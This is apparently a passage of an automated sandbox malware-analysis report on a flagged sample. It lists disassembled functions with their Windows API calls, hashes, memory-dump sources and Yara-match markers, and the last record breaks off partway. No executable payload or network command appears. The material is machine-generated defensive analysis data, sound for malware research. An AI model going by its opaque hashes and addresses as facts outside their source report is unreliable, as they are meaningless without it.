                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                            • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                            • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA6E
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA97
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,024CBCF4,?,00000000), ref: 024CBAAC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction ID: fe700fbc09080462cc1489e1ccd3d969674786d001abbddece9df515dcfa908c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F21773A600105AAD7748F5DD902BA777A6EB44E5CB66806EE989D7310F733DE81C350
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024CBCB5
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 024CBD10
                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 024CBD1F
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,024C0A1C,00000040,?,024C0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024CBD67
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,024C0A9C,00000040), ref: 024CBD86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2287132625-0
                                                                                                                                                                                                                                            • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                            • Instruction ID: 0234186ece980b335b2201505978ecfd96848d35706020ce265d594a3b812761
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F15193799002099BEB51DFA9DC42ABF77B9FF14708F24042FE901E7290EB719A41CB61
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2287132625-0
                                                                                                                                                                                                                                            • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                            • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID:
• String ID: C$C
• API String ID: 0-238425240
• Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
• Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
• Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
• Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024C0A23,?,?,?,?,024C047A,?,00000004), ref: 024CB353
• _wcschr.LIBVCRUNTIME ref: 024CB3E3
• _wcschr.LIBVCRUNTIME ref: 024CB3F1
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024C0A23,00000000,024C0B43), ref: 024CB494
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction ID: 807a92623273bad5a0fc5b797991b55d28319ce553299938bf2ac813a247c003
• Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction Fuzzy Hash: E861FB79604206AAD765AF3DDC46BBB73ADEF04718F24402FE905D7280EB74D540CB65
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
• _wcschr.LIBVCRUNTIME ref: 0043B17C
• _wcschr.LIBVCRUNTIME ref: 0043B18A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
• Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
• Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
• Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free
• String ID:
• API String ID: 2834031935-0
• Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
• Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
• Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
• Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0249DAD7), ref: 024BA732
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0249DAD7), ref: 024BA73C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0249DAD7), ref: 024BA749
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction ID: bcd2dae695cca78a1cf2393b09307dd5b9720e163ffa21b8a3c6072774895f94
• Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction Fuzzy Hash: F831C67490122C9BCB21DF69D9887DDBBB8BF19710F5041EAE40CA7250E7709B858F54
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
• Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
• Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
• Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
APIs
• GetCurrentProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00E7
• TerminateProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00EE
• ExitProcess.KERNEL32 ref: 024C0100
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction ID: 94596048c1fa0f4895347fcea5cbe06743c4e0f01de4d51cbf750717c5248447
• Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction Fuzzy Hash: 36E04639000148EBCF526F99DD08A493B6AEB02B52F20402DF9048B230CB36EA42DE44
APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                            • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                            • API String ID: 0-2784972518
                                                                                                                                                                                                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                            • Instruction ID: 11c3ce01d4b21e2cad106f8ee3e8e99851c685a3892a5c7049a3e18a3c7c256e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 153139B6900609DFDB10CF99C880AAEBBF9FF48328F15514AD841AB310D771EA45CFA4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                            • API String ID: 0-2043925204
                                                                                                                                                                                                                                            • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                            • Instruction ID: f2770f8a9dcd4ba6199dd1f4cf84a48872e5b76d7781d084af10b5db9c307d3d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2841087A500219AECB219FBDDC48EAB77B9EF84714F60466EF905D7280E7319D41CB50
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                            • API String ID: 0-2043925204
                                                                                                                                                                                                                                            • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                            • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                            • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                            • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                            • Instruction ID: 6bc98911374f568c0420925b4315458e0cf8497bb0fef3618f73e48cfaf34742
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0022B71E002199BDF15CFA9C9806EEB7F1EF88314F15866AE919E7380D731A945CF90
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0249262C
                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 024927CA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4264772764-0
                                                                                                                                                                                                                                            • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction ID: 7fed65e829bdb85d7086353b8c6347e6979f9d2d992ed28c86823371e4499b97
• Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
• Instruction Fuzzy Hash: 7F412125964344A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024C6F21,?,?,00000008,?,?,024CF3E2,00000000), ref: 024C7153
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 14ef7885017bb4ceecc72a04d284f4eca1241b39c27560258c8e6703b9305fb5
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: DFB127392106089FD755CF2CC48AB65BBA4FB45368F29865DE89ACF3A1C735D982CF40

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
